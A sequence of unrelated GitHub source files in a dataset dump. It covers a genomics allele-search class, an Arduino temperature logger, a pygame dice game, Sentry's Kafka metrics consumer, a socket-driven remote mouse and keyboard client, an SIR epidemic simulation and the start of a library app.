container_.pileupreads]\n hp = [get_hp(p.alignment.tags)[1] for p in container_.pileupreads]\n else:\n self.noReads[i] = True\n\n if type(ref) is str:\n self.ref = ReferenceCache(database=ref, chrom=containers[0].chromosome)\n else:\n self.ref = ref\n self.ref.chrom = containers[0].chromosome\n\n windowStart = min(refStarts + [start]) - 10\n windowEnd = -float('inf') # max([container_.referenceEnd for container_ in containers]) + 10\n\n for c in containers:\n if len(c.pileupreads) > 0:\n windowEnd = max(windowEnd, c.referenceEnd)\n\n if windowStart < 0:\n raise LocationOutOfBounds\n\n if windowEnd > len(self.ref):\n raise LocationOutOfBounds\n\n if windowEnd < 0:\n raise LocationOutOfBounds\n\n windowEnd += 10\n reference = ''.join(self.ref[windowStart: windowEnd])\n\n if len(containers) == 1:\n pacbio_flags = [pacbio for i in reads] \n else:\n pacbio_flags = [False for i in containers[0].pileupreads] + [True for i in containers[1].pileupreads]\n \n self.searcher = libCallability.AlleleSearcherLite(\n reads,\n names,\n qualities,\n cigartuples,\n refStarts,\n mapq,\n orientation,\n pacbio_flags,\n hp,\n reference,\n windowStart,\n start,\n stop,\n hybrid_hotspot\n )\n\n self.searcher.minMapQ = mapq_threshold\n self.searcher.qThreshold = q_threshold\n self.searcher.max_reassembly_region_size = reassembly_size\n\n logging.debug(\"Set mapq threshold, q threshold to %d, %d\" % (self.searcher.minMapQ, self.searcher.qThreshold))\n\n self.searcher.initialize()\n\n x = self.differingRegions\n\n @property\n def refAllele(self):\n return self.searcher.refAllele\n\n @property\n def differingRegions(self):\n if all(self.noReads):\n return []\n\n if hasattr(self, 'regions'):\n return self.regions\n\n self.searcher.determineDifferingRegions(self.strict)\n\n self.regions = [\n (\n max(self.start, item.first), min(self.stop, item.second)\n ) for item in self.searcher.differingRegions\n ]\n\n return self.regions\n\n @property\n def allelesAtSite(self):\n alleles = set()\n\n if all(self.noReads):\n return alleles\n\n for item in self.searcher.allelesAtSite:\n alleles.add(item)\n\n return alleles\n\n def addAlleleForAssembly(self, allele):\n \"\"\"\n Set an allele for assembly. When alleles are set, assembly uses\n only the set alleles.\n\n :param allele: str\n Allele to be used for assembly\n \"\"\"\n if not all(self.noReads):\n self.searcher.addAlleleForAssembly(allele)\n\n @profile\n def computeFeatures(self, allele, index=0):\n \"\"\"\n Computes features for a given allele\n\n :param allele: str\n Allele for which features are to be computed\n\n :param index: int\n The read set for which features are to be released\n\n :return: np.ndarray\n Feature using numpy\n \"\"\"\n if self.noReads[index if self.hybrid else 0]:\n return np.zeros(shape=(\n 1, self.featureLength, 7 if self.include_hp_tags else 6), dtype=np.uint8)\n else:\n index = index == 1 if self.hybrid else self.pacbio\n return self.searcher.computeFeaturesColoredSimple(\n allele, self.featureLength, index, self.include_hp_tags)\n\n @property\n def cluster(self):\n return self.differingRegions\n\n @profile\n def assemble_region(self):\n \"\"\"\n Assemble the complete region\n \"\"\"\n reassemble = False\n\n if len(self.containers) == 2:\n if self.containers[0].average_coverage > 14:\n reassemble = True\n\n self.searcher.assemble_alleles_from_reads(reassemble);\n\n @profile\n def assemble(self, start=None, stop=None):\n \"\"\"\n Performs assembly between start and stop\n\n :param start: int\n start postion of suspected allele\n\n :param stop: int\n stop position of suspected allele\n\n :return: iterable\n List-like object\n \"\"\"\n if all(self.noReads):\n return\n\n if start is None:\n start = self.start\n\n if stop is None:\n stop = self.stop\n\n self.searcher.assemble(start, stop)\n\n def numReadsSupportingAlleleStrict(self, allele, index):\n \"\"\"\n Provides the number of reads fully encapsulating an allele\n\n :param allele: str\n Allele for which the number of supporting reads is desired\n\n :param index: int\n Read set for which query is being made\n\n :return: int\n Number of reads supporting the given allele\n \"\"\"\n if self.noReads[index if self.hybrid else 0]:\n return 0\n\n index = index == 1 if self.hybrid else self.pacbio\n return self.searcher.numReadsSupportingAlleleStrict(allele, index)\n\n def determineAllelesInRegion(self, start, stop):\n \"\"\"\n Function determines alleles in region without performing assembly (unlike property allelesAtSite)\n\n :param start: int\n Start of region\n\n :param stop: int\n End of region\n\n :return: list\n List of alleles from reads\n \"\"\"\n if all(self.noReads):\n return []\n else:\n return list(self.searcher.determineAllelesAtSite(start, stop))\n\n def clearAllelesForAssembly(self):\n \"\"\"\n Clears preset alleles for assembly\n \"\"\"\n if not all(self.noReads):\n self.searcher.clearAllelesForAssembly()\n\n","repo_name":"anands-repo/hello","sub_path":"python/AlleleSearcherLite.py","file_name":"AlleleSearcherLite.py","file_ext":"py","file_size_in_byte":9781,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"40197438540","text":"## import libraries\nimport serial\nimport time\nimport datetime\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## set COM and wait for connection (Arudino Serial Monitor must be closed)\ncomm_error = True\nwhile comm_error:\n try:\n ser = serial.Serial('COM3', 9600)\n print('Connected to COM3!')\n comm_error = False\n except:\n print('Waiting for connection to COM3...')\n time.sleep(3)\n\n## read 100 cycles from serial and save to dataframe\nnumber_of_cycles = 5\ncounter = 0\ndf = pd.DataFrame(columns=['timestamp','temperature']) # set up dataframe\nstart_time = datetime.datetime.now() # log start time of data collection\n\nwhile (counter < number_of_cycles):\n try:\n serial_data = ser.readline()\n decoded_serial_data = float(serial_data[0:len(serial_data)-2].decode(\"utf-8\"))\n time_now = datetime.datetime.now()\n print(\"Counter: {} Time: {} Serial: {}\".format(counter,time_now,decoded_serial_data))\n df = df.append(pd.Series([time_now,decoded_serial_data], index=df.columns ), ignore_index=True)\n #time.sleep(2)\n counter+=1\n \n except:\n print(\"keyboard interrupt\")\n break\n\n## plot data and save figure to png\ndf.plot(kind='line',x='timestamp',y='temperature',color='blue')\nplt.savefig(start_time.strftime(\"%Y%m%d%H%M%S\")+'.png')\n","repo_name":"kylehorton33/compostSensors","sub_path":"serialReader.py","file_name":"serialReader.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32742765282","text":"import pygame\nimport pygame.draw\nimport pygame.font\nimport pygame.transform\nimport sys\nfrom pygame.locals import *\nimport random\nimport pygame.mixer\n\npygame.init()\npygame.font.init()\npygame.mixer.init()\n\n# Base setup\ntitle = \"Dice Rolling Simulator\"\nwidth, height = 1200, 900\n\nFPS = 60\n\nclock = pygame.time.Clock()\n\ndisplay = pygame.display.set_mode((width, height))\npygame.display.set_caption(title)\n\n\n# Dices\ndices = [\n pygame.image.load(\"assets/die1.png\").convert_alpha(),\n pygame.image.load(\"assets/die2.png\").convert_alpha(),\n pygame.image.load(\"assets/die3.png\").convert_alpha(),\n pygame.image.load(\"assets/die4.png\").convert_alpha(),\n pygame.image.load(\"assets/die5.png\").convert_alpha(),\n pygame.image.load(\"assets/die6.png\").convert_alpha(),\n]\ndefault_dice = dices[0]\n\n\n\n# Dice Audio\ndice_roll = pygame.mixer.Sound(\"assets/dice_roll.wav\")\n\n\n\n# Game Class\nclass Game():\n def __init__(self):\n self.run = 1\n\n self.current_dice = default_dice\n self.current_dice_rect = pygame.Rect(\n width/2 - self.current_dice.get_width()/2,\n height/2 - self.current_dice.get_height()/2,\n self.current_dice.get_width(),\n self.current_dice.get_height()\n )\n\n\n # Title\n self.title_font = pygame.font.SysFont(\"ComicSans\", 100)\n self.title_render = self.title_font.render(\"Dice Rolling Simulator\", True, (255,255,255))\n\n\n # Roll Button\n self.roll_button = pygame.Rect(width/2 - 300/2, height - 200, 300, 80)\n self.roll_font = pygame.font.SysFont(\"ComicSans\", 50)\n self.roll_render = self.roll_font.render(\"Roll The Dice\", True, (50, 50, 50))\n\n\n # Animate \n self.animate = False\n\n def draw(self):\n display.fill((50,50,50))\n\n pygame.draw.rect(display, (255,255,255), self.roll_button)\n \n display.blit(self.roll_render, (self.roll_button.x + self.roll_render.get_width()/4 - 10, self.roll_button.y + self.roll_render.get_height() - 10))\n\n if self.animate:\n for dice in dices:\n display.blit(dice, (self.current_dice_rect.x, self.current_dice_rect.y))\n \n self.animate = False\n\n else:\n display.blit(self.current_dice, (self.current_dice_rect.x, self.current_dice_rect.y))\n\n\n display.blit(self.title_render, (width/2 - self.title_render.get_width()/2, 100))\n\n pygame.display.update()\n \n\n def start(self):\n # Game loop\n while self.run:\n\n mouse_pos = pygame.mouse.get_pos()\n \n clock.tick(FPS)\n\n self.draw()\n\n # Handling Events\n for event in pygame.event.get():\n # Quit Event\n if event.type == QUIT:\n self.run = 0\n pygame.quit()\n sys.exit()\n\n if event.type == MOUSEBUTTONDOWN:\n if self.roll_button.collidepoint(mouse_pos):\n self.animate = True\n dice_roll.play()\n self.current_dice = random.choice(dices)\n\n\n\nGame().start()\n \n ","repo_name":"formerzayed/Dice-Rolling-Simulator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73987614326","text":"import functools\nimport logging\nimport time\nfrom collections import defaultdict, deque\nfrom concurrent.futures import Future\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom functools import partial\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n Deque,\n List,\n Mapping,\n MutableMapping,\n NamedTuple,\n Optional,\n Set,\n Union,\n)\n\nfrom arroyo.backends.abstract import Producer as AbstractProducer\nfrom arroyo.backends.kafka import KafkaConsumer, KafkaPayload, KafkaProducer\nfrom arroyo.processing import StreamProcessor\nfrom arroyo.processing.strategies import MessageRejected\nfrom arroyo.processing.strategies import ProcessingStrategy\nfrom arroyo.processing.strategies import ProcessingStrategy as ProcessingStep\nfrom arroyo.processing.strategies import ProcessingStrategyFactory\nfrom arroyo.processing.strategies.streaming.transform import ParallelTransformStep\nfrom arroyo.types import Message, Partition, Position, Topic\nfrom confluent_kafka import Producer\nfrom django.conf import settings\n\nfrom sentry.utils import json, kafka_config\nfrom sentry.utils.batching_kafka_consumer import create_topics\n\nDEFAULT_QUEUED_MAX_MESSAGE_KBYTES = 50000\nDEFAULT_QUEUED_MIN_MESSAGES = 100000\n\nlogger = logging.getLogger(__name__)\n\nMessageBatch = List[Message[KafkaPayload]]\n\n\ndef initializer() -> None:\n from sentry.runner import configure\n\n configure()\n\n\n@functools.lru_cache(maxsize=10)\ndef get_indexer(): # type: ignore\n from sentry.sentry_metrics import indexer\n\n return indexer\n\n\n@functools.lru_cache(maxsize=10)\ndef get_metrics(): # type: ignore\n from sentry.utils import metrics\n\n return metrics\n\n\ndef get_config(topic: str, group_id: str, auto_offset_reset: str) -> MutableMapping[Any, Any]:\n cluster_name: str = settings.KAFKA_TOPICS[topic][\"cluster\"]\n consumer_config: MutableMapping[Any, Any] = kafka_config.get_kafka_consumer_cluster_options(\n cluster_name,\n override_params={\n \"auto.offset.reset\": auto_offset_reset,\n \"enable.auto.commit\": False,\n \"enable.auto.offset.store\": False,\n \"group.id\": group_id,\n # `default.topic.config` is now deprecated.\n # More details: https://docs.confluent.io/platform/current/clients/confluent-kafka-python/html/index.html#kafka-client-configuration)\n \"default.topic.config\": {\"auto.offset.reset\": auto_offset_reset},\n # overridden to reduce memory usage when there's a large backlog\n \"queued.max.messages.kbytes\": DEFAULT_QUEUED_MAX_MESSAGE_KBYTES,\n \"queued.min.messages\": DEFAULT_QUEUED_MIN_MESSAGES,\n },\n )\n return consumer_config\n\n\nclass DuplicateMessage(Exception):\n pass\n\n\nclass MetricsBatchBuilder:\n \"\"\"\n Batches up individual messages - type: Message[KafkaPayload] - into a\n list, which will later be the payload for the big outer message\n that gets passed through to the ParallelTransformStep.\n\n See `__flush` method of BatchMessages for when that happens.\n \"\"\"\n\n def __init__(self, max_batch_size: int, max_batch_time: float) -> None:\n self.__messages: MessageBatch = []\n self.__max_batch_size = max_batch_size\n self.__deadline = time.time() + max_batch_time / 1000.0\n self.__offsets: Set[int] = set()\n\n def __len__(self) -> int:\n return len(self.__messages)\n\n @property\n def messages(self) -> MessageBatch:\n return self.__messages\n\n def append(self, message: Message[KafkaPayload]) -> None:\n if message.offset in self.__offsets:\n raise DuplicateMessage\n self.__messages.append(message)\n self.__offsets.add(message.offset)\n\n def ready(self) -> bool:\n if len(self.messages) >= self.__max_batch_size:\n return True\n elif time.time() >= self.__deadline:\n return True\n else:\n return False\n\n\nclass BatchMessages(ProcessingStep[KafkaPayload]): # type: ignore\n \"\"\"\n First processing step in the MetricsConsumerStrategyFactory.\n Keeps track of a batch of messages (using the MetricsBatchBuilder)\n and then when at capacity, either max_batch_time or max_batch_size,\n flushes the batch.\n\n Flushing the batch here means wrapping the batch in a Message, the batch\n itself being the payload. This is what the ParallelTransformStep will\n process in the process_message function.\n \"\"\"\n\n def __init__(\n self,\n next_step: ProcessingStrategy[MessageBatch],\n max_batch_time: float,\n max_batch_size: int,\n ):\n self.__max_batch_size = max_batch_size\n self.__max_batch_time = max_batch_time\n\n self.__next_step = next_step\n self.__batch: Optional[MetricsBatchBuilder] = None\n self.__closed = False\n\n def poll(self) -> None:\n assert not self.__closed\n\n self.__next_step.poll()\n\n if self.__batch and self.__batch.ready():\n try:\n self.__flush()\n except MessageRejected:\n # Probably means that we have received back pressure due to the\n # ParallelTransformStep.\n logger.debug(\"Attempt to flush batch failed...Re-trying in next poll\")\n pass\n\n def submit(self, message: Message[KafkaPayload]) -> None:\n if self.__batch is None:\n self.__batch = MetricsBatchBuilder(self.__max_batch_size, self.__max_batch_time)\n\n try:\n self.__batch.append(message)\n except DuplicateMessage:\n # If we are getting back pressure from the next_step (ParallelTransformStep),\n # the consumer will keep trying to submit the same carried over message\n # until it succeeds and stops throwing the MessageRejected error. In this\n # case we don't want to keep adding the same message to the batch over and\n # over again\n logger.debug(f\"Message already added to batch with offset: {message.offset}\")\n pass\n\n if self.__batch and self.__batch.ready():\n self.__flush()\n\n def __flush(self) -> None:\n if not self.__batch:\n return\n last = self.__batch.messages[-1]\n\n new_message = Message(last.partition, last.offset, self.__batch.messages, last.timestamp)\n\n self.__next_step.submit(new_message)\n self.__batch = None\n\n def terminate(self) -> None:\n self.__closed = True\n self.__next_step.terminate()\n\n def close(self) -> None:\n self.__closed = True\n\n def join(self, timeout: Optional[float] = None) -> None:\n if self.__batch:\n last = self.__batch.messages[-1]\n logger.debug(\n f\"Abandoning batch of {len(self.__batch)} messages...latest offset: {last.offset}\"\n )\n\n self.__next_step.close()\n self.__next_step.join(timeout)\n\n\nif TYPE_CHECKING:\n\n class ProducerResultFuture(NamedTuple):\n message: Message[KafkaPayload]\n future: Future[Message[KafkaPayload]]\n\n\nelse:\n\n class ProducerResultFuture(NamedTuple):\n message: Message[KafkaPayload]\n future: Future\n\n\nclass ProduceStep(ProcessingStep[MessageBatch]): # type: ignore\n \"\"\"\n Step that produces to the snuba-metrics topic, collecting the futures returned by\n the producer. Continously checks to see if futures are done, and once that's the case\n can commit up to the last future that is done.\n \"\"\"\n\n def __init__(\n self,\n commit_function: Callable[[Mapping[Partition, Position]], None],\n producer: Optional[AbstractProducer] = None,\n ) -> None:\n if not producer:\n snuba_metrics = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS]\n snuba_metrics_producer = KafkaProducer(\n kafka_config.get_kafka_producer_cluster_options(snuba_metrics[\"cluster\"]),\n )\n producer = snuba_metrics_producer\n self.__producer = producer\n self.__producer_topic = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS].get(\n \"topic\", \"snuba-metrics\"\n )\n self.__commit_function = commit_function\n\n self.__futures: Deque[ProducerResultFuture] = deque()\n self.__closed = False\n\n # TODO(meredith): make this an option to pass in\n self.__max_buffer_size = 10000\n\n # XXX(meredith): This is only temporary to record how much\n # time we spend committing when we commit once per message\n # instead of batching commits\n self.__commit_start = time.time()\n self.__commit_duration_sum = 0.0\n self.__metrics = get_metrics()\n\n def poll(self) -> None:\n while self.__futures:\n if not self.__futures[0].future.done():\n break\n\n result_future = self.__futures.popleft()\n message, future = result_future\n\n try:\n future.result()\n except Exception:\n # TODO(meredith): log info for the different errors\n # that could happen:\n # * CancelledError (future was cancelled)\n # * TimeoutError (future timedout)\n # * Exception (the future call raised an exception)\n raise\n start = time.time()\n self.__commit_function({message.partition: Position(message.offset, message.timestamp)})\n end = time.time()\n commit_duration = end - start\n self._record_commit_duration(commit_duration)\n\n def _record_commit_duration(self, commit_duration: float) -> None:\n self.__commit_duration_sum += commit_duration\n\n # record commit durations every 5 seconds\n if (self.__commit_start + 5) < time.time():\n self.__metrics.incr(\n \"produce_step.commit_duration\", amount=int(self.__commit_duration_sum)\n )\n self.__commit_duration_sum = 0\n self.__commit_start = time.time()\n\n def submit(self, outer_message: Message[MessageBatch]) -> None:\n assert not self.__closed\n\n if len(self.__futures) >= self.__max_buffer_size:\n raise MessageRejected\n\n for message in outer_message.payload:\n payload = message.payload\n future = self.__producer.produce(\n destination=Topic(self.__producer_topic),\n payload=payload,\n )\n self.__futures.append(ProducerResultFuture(message, future))\n\n def close(self) -> None:\n self.__closed = True\n\n def terminate(self) -> None:\n self.__closed = True\n\n self.__producer.close()\n\n def join(self, timeout: Optional[float] = None) -> None:\n start = time.time()\n while self.__futures:\n remaining = timeout - (time.time() - start) if timeout is not None else None\n if remaining is not None and remaining <= 0:\n logger.warning(f\"Timed out with {len(self.__futures)} futures in queue\")\n break\n\n message, future = self.__futures.popleft()\n\n future.result(remaining)\n\n self.__commit_function({message.partition: Position(message.offset, message.timestamp)})\n self.__producer.close()\n\n\ndef process_messages(\n outer_message: Message[MessageBatch],\n) -> MessageBatch:\n \"\"\"\n We have an outer_message Message() whose payload is a batch of Message() objects.\n\n Message(\n partition=...,\n offset=...\n timestamp=...\n payload=[Message(...), Message(...), etc]\n )\n\n The inner messages payloads are KafkaPayload's that have:\n * key\n * headers\n * value\n\n The value of the message is what we need to parse and then translate\n using the indexer.\n \"\"\"\n indexer = get_indexer()\n metrics = get_metrics()\n\n org_strings = defaultdict(set)\n strings = set()\n with metrics.timer(\"process_messages.parse_outer_message\"):\n parsed_payloads_by_offset = {\n msg.offset: json.loads(msg.payload.value.decode(\"utf-8\"), use_rapid_json=True)\n for msg in outer_message.payload\n }\n for message in parsed_payloads_by_offset.values():\n metric_name = message[\"name\"]\n org_id = message[\"org_id\"]\n tags = message.get(\"tags\", {})\n\n parsed_strings = {\n metric_name,\n *tags.keys(),\n *tags.values(),\n }\n org_strings[org_id].update(parsed_strings)\n strings.update(parsed_strings)\n\n metrics.incr(\"process_messages.total_strings_indexer_lookup\", amount=len(strings))\n\n with metrics.timer(\"metrics_consumer.bulk_record\"):\n mapping = indexer.bulk_record(org_strings)\n\n new_messages: List[Message[KafkaPayload]] = []\n\n with metrics.timer(\"process_messages.reconstruct_messages\"):\n for message in outer_message.payload:\n parsed_payload_value = parsed_payloads_by_offset[message.offset]\n new_payload_value = deepcopy(parsed_payload_value)\n\n metric_name = parsed_payload_value[\"name\"]\n org_id = parsed_payload_value[\"org_id\"]\n tags = parsed_payload_value.get(\"tags\", {})\n\n try:\n new_tags: Mapping[int, int] = {\n mapping[org_id][k]: mapping[org_id][v] for k, v in tags.items()\n }\n except KeyError:\n logger.error(\"process_messages.key_error\", extra={\"tags\": tags}, exc_info=True)\n continue\n\n new_payload_value[\"tags\"] = new_tags\n new_payload_value[\"metric_id\"] = mapping[org_id][metric_name]\n new_payload_value[\"retention_days\"] = 90\n\n del new_payload_value[\"name\"]\n\n new_payload = KafkaPayload(\n key=message.payload.key,\n value=json.dumps(new_payload_value).encode(),\n headers=message.payload.headers,\n )\n new_message = Message(\n partition=message.partition,\n offset=message.offset,\n payload=new_payload,\n timestamp=message.timestamp,\n )\n new_messages.append(new_message)\n\n metrics.incr(\"metrics_consumer.process_message.messages_seen\", amount=len(new_messages))\n\n return new_messages\n\n\nclass MetricsConsumerStrategyFactory(ProcessingStrategyFactory): # type: ignore\n def __init__(\n self,\n max_batch_size: int,\n max_batch_time: float,\n processes: int,\n input_block_size: int,\n output_block_size: int,\n ):\n self.__max_batch_time = max_batch_time\n self.__max_batch_size = max_batch_size\n\n self.__processes = processes\n\n self.__input_block_size = input_block_size\n self.__output_block_size = output_block_size\n\n def create(\n self, commit: Callable[[Mapping[Partition, Position]], None]\n ) -> ProcessingStrategy[KafkaPayload]:\n parallel_strategy = ParallelTransformStep(\n process_messages,\n ProduceStep(commit),\n self.__processes,\n max_batch_size=self.__max_batch_size,\n max_batch_time=self.__max_batch_time,\n input_block_size=self.__input_block_size,\n output_block_size=self.__output_block_size,\n initializer=initializer,\n )\n\n strategy = BatchMessages(parallel_strategy, self.__max_batch_time, self.__max_batch_size)\n\n return strategy\n\n\nclass BatchConsumerStrategyFactory(ProcessingStrategyFactory): # type: ignore\n \"\"\"\n Batching Consumer Strategy\n \"\"\"\n\n def __init__(\n self,\n max_batch_size: int,\n max_batch_time: float,\n commit_max_batch_size: int,\n commit_max_batch_time: int,\n ):\n self.__max_batch_time = max_batch_time\n self.__max_batch_size = max_batch_size\n self.__commit_max_batch_time = commit_max_batch_time\n self.__commit_max_batch_size = commit_max_batch_size\n\n def create(\n self, commit: Callable[[Mapping[Partition, Position]], None]\n ) -> ProcessingStrategy[KafkaPayload]:\n transform_step = TransformStep(\n next_step=SimpleProduceStep(\n commit,\n commit_max_batch_size=self.__commit_max_batch_size,\n # convert to seconds\n commit_max_batch_time=self.__commit_max_batch_time / 1000,\n )\n )\n strategy = BatchMessages(transform_step, self.__max_batch_time, self.__max_batch_size)\n return strategy\n\n\nclass TransformStep(ProcessingStep[MessageBatch]): # type: ignore\n \"\"\"\n Temporary Transform Step\n \"\"\"\n\n def __init__(\n self,\n next_step: ProcessingStep[KafkaPayload],\n ) -> None:\n self.__process_messages = process_messages\n self.__next_step = next_step\n self.__closed = False\n self.__metrics = get_metrics()\n\n def poll(self) -> None:\n self.__next_step.poll()\n\n def submit(self, message: Message[MessageBatch]) -> None:\n assert not self.__closed\n\n with self.__metrics.timer(\"transform_step.process_messages\"):\n transformed_message_batch = self.__process_messages(message)\n\n for transformed_message in transformed_message_batch:\n self.__next_step.submit(transformed_message)\n\n def close(self) -> None:\n self.__closed = True\n\n def terminate(self) -> None:\n self.__closed = True\n\n logger.debug(\"Terminating %r...\", self.__next_step)\n self.__next_step.terminate()\n\n def join(self, timeout: Optional[float] = None) -> None:\n self.__next_step.close()\n self.__next_step.join(timeout)\n\n\nclass UnflushedMessages(Exception):\n pass\n\n\nclass OutOfOrderOffset(Exception):\n pass\n\n\n@dataclass\nclass PartitionOffset:\n position: Position\n partition: Partition\n\n\nclass SimpleProduceStep(ProcessingStep[KafkaPayload]): # type: ignore\n def __init__(\n self,\n commit_function: Callable[[Mapping[Partition, Position]], None],\n commit_max_batch_size: int,\n commit_max_batch_time: float,\n ) -> None:\n snuba_metrics = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS]\n snuba_metrics_producer = Producer(\n kafka_config.get_kafka_producer_cluster_options(snuba_metrics[\"cluster\"]),\n )\n producer = snuba_metrics_producer\n self.__producer = producer\n self.__producer_topic = settings.KAFKA_TOPICS[settings.KAFKA_SNUBA_METRICS].get(\n \"topic\", \"snuba-metrics\"\n )\n self.__commit_function = commit_function\n\n self.__closed = False\n self.__metrics = get_metrics()\n self.__produced_message_offsets: MutableMapping[Partition, Position] = {}\n self.__callbacks = 0\n self.__started = time.time()\n # TODO: Need to make these flags\n self.__commit_max_batch_size = commit_max_batch_size\n self.__commit_max_batch_time = commit_max_batch_time\n self.__producer_queue_max_size = 80000\n self.__producer_long_poll_timeout = 3.0\n\n # poll duration metrics\n self.__poll_start_time = time.time()\n self.__poll_duration_sum = 0.0\n\n def _ready(self) -> bool:\n now = time.time()\n duration = now - self.__started\n if self.__callbacks >= self.__commit_max_batch_size:\n logger.info(\n f\"Max size reached: total of {self.__callbacks} messages after {duration:.{2}f} seconds\"\n )\n return True\n if now >= (self.__started + self.__commit_max_batch_time):\n logger.info(\n f\"Max time reached: total of {self.__callbacks} messages after {duration:.{2}f} seconds\"\n )\n return True\n\n return False\n\n def _record_poll_duration(self, poll_duration: float) -> None:\n self.__poll_duration_sum += poll_duration\n\n # record poll time durations every 5 seconds\n if (self.__poll_start_time + 5) < time.time():\n self.__metrics.timing(\"simple_produce_step.join_duration\", self.__poll_duration_sum)\n self.__poll_duration_sum = 0\n self.__poll_start_time = time.time()\n\n def poll_producer(self, timeout: float) -> None:\n with self.__metrics.timer(\"simple_produce_step.producer_poll_duration\", sample_rate=0.05):\n start = time.time()\n self.__producer.poll(timeout)\n end = time.time()\n\n poll_duration = end - start\n self._record_poll_duration(poll_duration)\n\n def poll(self) -> None:\n timeout = 0.0\n if len(self.__producer) >= self.__producer_queue_max_size:\n self.__metrics.incr(\n \"simple_produce_step.producer_queue_backup\", amount=len(self.__producer)\n )\n timeout = self.__producer_long_poll_timeout\n\n self.poll_producer(timeout)\n\n if self._ready():\n self.__commit_function(self.__produced_message_offsets)\n self.__callbacks = 0\n self.__produced_message_offsets = {}\n self.__started = time.time()\n\n def submit(self, message: Message[KafkaPayload]) -> None:\n position = Position(message.next_offset, message.timestamp)\n self.__producer.produce(\n topic=self.__producer_topic,\n key=None,\n value=message.payload.value,\n on_delivery=partial(self.callback, partition=message.partition, position=position),\n )\n\n def callback(self, error: Any, message: Any, partition: Partition, position: Position) -> None:\n if message and error is None:\n self.__callbacks += 1\n self.__produced_message_offsets[partition] = position\n if error is not None:\n raise Exception(error.str())\n\n def terminate(self) -> None:\n self.__closed = True\n\n def close(self) -> None:\n self.__closed = True\n\n def join(self, timeout: Optional[float]) -> None:\n with self.__metrics.timer(\"simple_produce_step.join_duration\"):\n if not timeout:\n timeout = 5.0\n self.__producer.flush(timeout)\n\n if self.__callbacks:\n logger.info(f\"Committing {self.__callbacks} messages...\")\n self.__commit_function(self.__produced_message_offsets)\n self.__callbacks = 0\n self.__produced_message_offsets = {}\n self.__started = time.time()\n\n\ndef get_streaming_metrics_consumer(\n topic: str,\n commit_max_batch_size: int,\n commit_max_batch_time: int,\n max_batch_size: int,\n max_batch_time: float,\n processes: int,\n input_block_size: int,\n output_block_size: int,\n group_id: str,\n auto_offset_reset: str,\n factory_name: str,\n **options: Mapping[str, Union[str, int]],\n) -> StreamProcessor:\n if factory_name == \"multiprocess\":\n processing_factory = MetricsConsumerStrategyFactory(\n max_batch_size=max_batch_size,\n max_batch_time=max_batch_time,\n processes=processes,\n input_block_size=input_block_size,\n output_block_size=output_block_size,\n )\n else:\n assert factory_name == \"default\"\n processing_factory = BatchConsumerStrategyFactory(\n max_batch_size=max_batch_size,\n max_batch_time=max_batch_time,\n commit_max_batch_size=commit_max_batch_size,\n commit_max_batch_time=commit_max_batch_time,\n )\n\n create_topics([topic])\n\n return StreamProcessor(\n KafkaConsumer(get_config(topic, group_id, auto_offset_reset)),\n Topic(topic),\n processing_factory,\n )\n","repo_name":"gms-ws-sandbox/sentry","sub_path":"src/sentry/sentry_metrics/multiprocess.py","file_name":"multiprocess.py","file_ext":"py","file_size_in_byte":23704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11842683989","text":"import mouse\r\nimport socket\r\nimport time\r\nimport keyboard\r\n\r\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient.connect((\"HOST_IP\", 8080))\r\nspecial_keys = [\"enter\", \"backspace\", \"space\", \"shift\", \"ctrl\", \"up\", \"down\", \"left\", \"right\"]\r\nprint(\"connected\")\r\nwhile True:\r\n pos = \"\"\r\n pos = client.recv(4096)\r\n if pos.decode(\"utf8\") == \"lclick\":\r\n print(\"click\")\r\n mouse.click()\r\n elif pos.decode(\"utf8\") == \"rclick\":\r\n print(\"right click\")\r\n mouse.click(button='right')\r\n else:\r\n pos1 = pos.decode(\"utf8\").split(\", \")\r\n if len(pos1) < 2:\r\n if len(pos1[0]) > 1:\r\n print(pos1[0])\r\n keyboard.press(pos1[0])\r\n else:\r\n print(pos1)\r\n keyboard.write(pos1[0]) \r\n else:\r\n print(pos1)\r\n mouse.move(pos1[0], pos1[1])","repo_name":"NoKodaAddictions/movemouse.py","sub_path":"movemouseClient.py","file_name":"movemouseClient.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72251692725","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom matplotlib import pyplot as plt\n\n# deklaracja stałych\nN = 1000.0\nI_0 = 1.0\nR_0 = 0.0\n\na = 1.0\nr = 0.002\n\ntimes = 50000\ndt = 0.001\n\n# inicjalizacja zmiennych\nI = [I_0]\nR = [R_0]\nS = [N - I_0 - R_0]\nT = [0]\n\n# główna pętla\nfor i in range(1, times):\n I.append(I[i-1] + (r * (N - I[i-1] - R[i-1]) * I[i-1] - a * I[i-1]) * dt)\n R.append(R[i-1] + a * I[i-1] * dt)\n S.append(N - I[i] - R[i])\n T.append(T[i-1] + dt)\n\n# rysowanie wykresu\nsus, = plt.plot(T, S, color='b')\ninf, = plt.plot(T, I, color='r')\nrec, = plt.plot(T, R, color='g')\nplt.legend([sus, inf, rec], [u'zdrowi', u'chorzy', u'odporni'])\nplt.xlabel(u'Czas')\nplt.ylabel(u'Liczba osób')\nplt.show()\n","repo_name":"traducha/epidemics_DOKO2017","sub_path":"differential/sir.py","file_name":"sir.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33815448580","text":"import models\nimport time\n\nlibrary = models.Library(\"Knowledge Bank\")\nlibrarian = models.Librarian(\"mohamed\",\"mohamed@gmail.com\")\nlibrary.add_librarian(librarian)\n\n\ndef main_page():\n\n 